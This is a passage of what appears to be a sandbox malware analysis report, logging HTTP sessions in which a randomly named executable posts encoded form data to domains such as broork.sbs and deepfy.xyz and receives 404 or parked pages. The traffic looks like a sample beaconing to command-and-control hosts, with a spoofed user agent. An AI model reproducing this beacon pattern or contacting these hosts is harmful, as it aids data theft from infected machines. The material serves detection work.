                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 30 56 37 42 66 4b 51 68 55 73 4b 76 32 39 32 56 4d 30 43 6f 74 71 55 63 69 78 61 35 37 31 4f 4f 78 64 67 58 31 79 5a 36 36 4d 48 5a 33 59 4f 75 65 63 49 68 59 6d 76 52 66 48 49 68 45 43 45 58 53 6c 53 30 66 54 4d 38 2f 6b 6d 4e 43 39 66 33 32 35 32 65 51 2f 42 53 75 6d 65 64 41 43 4f 73 4a 39 4d 33 55 62 6f 70 6e 75 34 45 64 47 62 58 38 57 4b 43 53 79 38 4d 78 4e 4b 63 4c 4e 71 48 4c 65 75 6f 6f 74 63 37 43 58 41 69 52 58 35 78 6a 73 6c 79 56 48 62 49 4f 72 52 67 63 58 72 79 35 2f 6e 61 6a 4d 45 71 69 4f 50 52 46 5a 76 71 65 74 71 44 49 67 56 56 66 45 6b 49 68 36 6d 54 6c 6f 73 4e 6a 31 4e 6b 37 42 76 43 51 35 34 68 66 6c 4a 48 39 53 41 3d
                                                                                                                      Data Ascii: sn0PLN=0V7BfKQhUsKv292VM0CotqUcixa571OOxdgX1yZ66MHZ3YOuecIhYmvRfHIhECEXSlS0fTM8/kmNC9f3252eQ/BSumedACOsJ9M3Ubopnu4EdGbX8WKCSy8MxNKcLNqHLeuootc7CXAiRX5xjslyVHbIOrRgcXry5/najMEqiOPRFZvqetqDIgVVfEkIh6mTlosNj1Nk7BvCQ54hflJH9SA=
                                                                                                                      Nov 1, 2024 09:20:30.492352009 CET1236INHTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                      pragma: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 1251
                                                                                                                      date: Fri, 01 Nov 2024 08:20:30 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      vary: User-Agent
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                      Nov 1, 2024 09:20:30.492405891 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                      Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      39192.168.2.462937163.44.176.12803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:32.185702085 CET10880OUTPOST /51fd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.broork.sbs
                                                                                                                      Origin: http://www.broork.sbs
                                                                                                                      Referer: http://www.broork.sbs/51fd/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 30 56 37 42 66 4b 51 68 55 73 4b 76 32 39 32 56 4d 30 43 6f 74 71 55 63 69 78 61 35 37 31 4f 4f 78 64 67 58 31 79 5a 36 36 4e 54 5a 32 75 61 75 66 39 49 68 5a 6d 76 52 65 48 49 73 45 43 45 47 53 6c 4c 2f 66 54 78 42 2f 6d 75 4e 51 50 58 33 2b 6f 32 65 4a 50 42 53 69 47 65 63 50 69 4f 63 4a 39 63 7a 55 66 4d 70 6e 75 34 45 64 46 7a 58 71 79 6d 43 51 79 38 54 6d 39 4b 41 50 4e 71 6a 4c 65 6d 34 6f 74 49 4e 43 6d 67 69 52 33 70 78 6b 61 52 79 57 6e 62 4b 4e 72 52 6f 63 58 58 68 35 37 2f 38 6a 49 4e 69 69 49 7a 52 4a 63 4f 2b 4f 63 43 68 51 47 52 79 4d 57 38 2f 75 5a 43 72 6a 62 59 7a 72 67 4a 57 35 54 72 49 62 4a 52 78 43 58 39 34 75 6c 37 32 6b 73 63 2f 73 4a 6e 76 76 54 6e 68 57 47 2b 58 59 70 34 67 54 5a 30 4c 49 33 31 63 2b 59 46 38 6f 72 4a 63 63 6a 53 2b 53 39 4e 76 51 49 65 54 62 4b 68 79 51 75 77 76 6d 4d 4f 61 49 54 4f 66 48 7a 38 45 71 4b 76 31 64 75 55 42 53 32 62 32 75 33 57 75 32 59 73 69 67 58 6b 68 6d 41 37 65 6a 77 68 59 38 63 6c 44 39 73 38 75 72 76 32 6a 68 71 72 [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=0V7BfKQhUsKv292VM0CotqUcixa571OOxdgX1yZ66NTZ2uauf9IhZmvReHIsECEGSlL/fTxB/muNQPX3+o2eJPBSiGecPiOcJ9czUfMpnu4EdFzXqymCQy8Tm9KAPNqjLem4otINCmgiR3pxkaRyWnbKNrRocXXh57/8jINiiIzRJcO+OcChQGRyMW8/uZCrjbYzrgJW5TrIbJRxCX94ul72ksc/sJnvvTnhWG+XYp4gTZ0LI31c+YF8orJccjS+S9NvQIeTbKhyQuwvmMOaITOfHz8EqKv1duUBS2b2u3Wu2YsigXkhmA7ejwhY8clD9s8urv2jhqrUG3cuW+ebwmlqjY7tsdKObCWBjHBy0HXS2Ej8RwqK3l1824od6Vrn6DSR7cvmfVMg0z6zBrxYky72V4sdWYQbD6hSjA/G7LSOnp//zl7P7RSb1UXNsoF8H5LwcY4kI4w1VMA5TkLxfBWguUPVQjxGzUM5mj6echTt2EKujsXu94gw00E9M7Khr4esS+8iE/BD5DazliVZIS+ait7nS4j1jsBmMssFrT4PXIVjK6pdvfkh3suRXdaJcy53gJJDAp9OtB7+0QllbzfLFAJIajyV+bVY+B+2KVu0MOnr6cDgcthYK3n/Wuww01FAcQ56luszvxmRhXLZqxAHhfiinjPq701T70ypNy/hGPSxJODVZ+oW+CzApNghiBihfqRNKDu/NzKxMucm9QxAX+8gloGz6bDCWczN1ceCWobnRvtbeuX/iqirV/vOadVRLO239/btAdrv2Xo432CWURkUwQDU7+YC8YmGFBjx/L7fJWLQ7mZOT0pzrdf1nSVKX2ScYa6q9dGP8LIbIFQggzn26eTi/PwJRfiwp2N3bMLfvDlF9hUnzi/myiIz+rHpTp0PR7CjK3xBnKIQcqrQZK/OLfg73COuAu5fKev7L+kduFjJEKIZyOTXI4Ubl7pEHllIvuw7VUeID7t2H5IhYRHWE8Gwl4g8Jd53gf2ZZ [TRUNCATED]


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      40192.168.2.462938163.44.176.12803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:34.730084896 CET527OUTGET /51fd/?sn0PLN=5XThc+sTNfSc1dyVCHius6QJlgyE7UD3g9QPrW9D0ZCA6InRQfgmSS7sY3ZsEANqCFm0SxAy1XScT67z0IieRfxf0Cr6BzHBArQcGKRuou4FU1nhplefNR0=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.broork.sbs
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:20:35.599164963 CET1236INHTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                      pragma: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 1251
                                                                                                                      date: Fri, 01 Nov 2024 08:20:35 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      vary: User-Agent
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                      Nov 1, 2024 09:20:35.599276066 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                      Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      41192.168.2.462939199.59.243.227803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:40.844985962 CET778OUTPOST /t7p4/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.deepfy.xyz
                                                                                                                      Origin: http://www.deepfy.xyz
                                                                                                                      Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 6f 2f 79 62 64 33 74 59 55 42 4e 44 39 72 70 66 5a 61 47 4b 54 69 4d 79 57 66 47 48 71 41 58 54 4d 31 35 78 63 4f 6e 67 74 4a 5a 70 7a 4b 51 5a 4d 64 55 55 72 61 69 74 4d 62 6b 48 56 4a 65 6e 6f 69 4d 45 57 39 6a 79 79 58 30 56 4f 30 51 6b 4d 41 53 77 45 72 50 37 75 35 48 52 43 64 62 73 71 45 79 38 33 37 4f 73 7a 6e 4b 75 42 4e 38 73 6f 34 70 74 35 64 39 55 6d 79 34 46 38 31 6f 73 61 61 75 72 72 69 34 38 33 67 77 31 37 6a 55 32 43 62 30 42 45 6f 41 35 46 6f 51 52 71 46 34 69 62 35 50 35 32 57 65 37 45 6d 34 53 65 38 42 66 71 70 76 53 57 75 4a 31 45 38 2f 38 2f 63 57 77 35 77 3d 3d
                                                                                                                      Data Ascii: sn0PLN=o/ybd3tYUBND9rpfZaGKTiMyWfGHqAXTM15xcOngtJZpzKQZMdUUraitMbkHVJenoiMEW9jyyX0VO0QkMASwErP7u5HRCdbsqEy837OsznKuBN8so4pt5d9Umy4F81osaaurri483gw17jU2Cb0BEoA5FoQRqF4ib5P52We7Em4Se8BfqpvSWuJ1E8/8/cWw5w==
                                                                                                                      Nov 1, 2024 09:20:41.499006033 CET1236INHTTP/1.1 200 OK
                                                                                                                      date: Fri, 01 Nov 2024 08:20:41 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1110
                                                                                                                      x-request-id: 0790608a-46c8-40bc-a860-cc660fcd03e7
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                      set-cookie: parking_session=0790608a-46c8-40bc-a860-cc660fcd03e7; expires=Fri, 01 Nov 2024 08:35:41 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 6a 56 32 37 55 72 32 6e 63 65 79 73 58 47 6f 50 30 31 39 41 32 76 57 49 79 58 6f 77 71 33 36 33 32 46 57 2b 39 6e 71 5a 37 71 59 45 59 2f 48 38 66 54 48 65 36 4f 4d 6f 68 6a 2b 49 6b 4d 4e 6f 4d 73 64 73 4e 64 30 51 5a 4c 74 63 36 5a 57 42 77 72 77 46 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 1, 2024 09:20:41.499053001 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDc5MDYwOGEtNDZjOC00MGJjLWE4NjAtY2M2NjBmY2QwM2U3IiwicGFnZV90aW1lIjoxNzMwNDQ5Mj


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      42192.168.2.462940199.59.243.227803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:43.388987064 CET798OUTPOST /t7p4/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.deepfy.xyz
                                                                                                                      Origin: http://www.deepfy.xyz
                                                                                                                      Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 6f 2f 79 62 64 33 74 59 55 42 4e 44 39 4c 5a 66 62 39 71 4b 45 79 4d 78 4b 50 47 48 78 77 58 58 4d 31 31 78 63 4d 4c 77 74 2f 42 70 79 71 67 5a 50 63 55 55 71 61 69 74 44 37 6b 65 4b 5a 65 38 6f 69 42 37 57 2f 33 79 79 58 77 56 4f 77 63 6b 4e 33 6d 2f 46 37 50 35 32 4a 48 54 66 74 62 73 71 45 79 38 33 39 69 43 7a 6e 69 75 41 39 4d 73 70 5a 70 71 33 39 39 56 77 69 34 46 32 56 6f 6f 61 61 75 64 72 6e 59 57 33 6c 73 31 37 6d 77 32 62 71 30 47 4e 6f 42 54 42 6f 52 66 75 51 56 5a 56 59 79 61 2f 78 69 6c 61 79 38 72 53 61 4d 46 37 59 4f 46 45 75 74 47 5a 37 32 49 79 66 72 35 69 32 50 36 59 6d 4e 5a 43 72 70 57 4f 36 44 42 61 6b 43 53 52 6f 67 3d
                                                                                                                      Data Ascii: sn0PLN=o/ybd3tYUBND9LZfb9qKEyMxKPGHxwXXM11xcMLwt/BpyqgZPcUUqaitD7keKZe8oiB7W/3yyXwVOwckN3m/F7P52JHTftbsqEy839iCzniuA9MspZpq399Vwi4F2VooaaudrnYW3ls17mw2bq0GNoBTBoRfuQVZVYya/xilay8rSaMF7YOFEutGZ72Iyfr5i2P6YmNZCrpWO6DBakCSRog=
                                                                                                                      Nov 1, 2024 09:20:44.002643108 CET1236INHTTP/1.1 200 OK
                                                                                                                      date: Fri, 01 Nov 2024 08:20:43 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1110
                                                                                                                      x-request-id: 9e28c18a-e20f-4d32-846a-5ff225454e61
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                      set-cookie: parking_session=9e28c18a-e20f-4d32-846a-5ff225454e61; expires=Fri, 01 Nov 2024 08:35:43 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 6a 56 32 37 55 72 32 6e 63 65 79 73 58 47 6f 50 30 31 39 41 32 76 57 49 79 58 6f 77 71 33 36 33 32 46 57 2b 39 6e 71 5a 37 71 59 45 59 2f 48 38 66 54 48 65 36 4f 4d 6f 68 6a 2b 49 6b 4d 4e 6f 4d 73 64 73 4e 64 30 51 5a 4c 74 63 36 5a 57 42 77 72 77 46 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 1, 2024 09:20:44.002721071 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWUyOGMxOGEtZTIwZi00ZDMyLTg0NmEtNWZmMjI1NDU0ZTYxIiwicGFnZV90aW1lIjoxNzMwNDQ5Mj


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      43192.168.2.462941199.59.243.227803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:45.985119104 CET10880OUTPOST /t7p4/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.deepfy.xyz
                                                                                                                      Origin: http://www.deepfy.xyz
                                                                                                                      Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
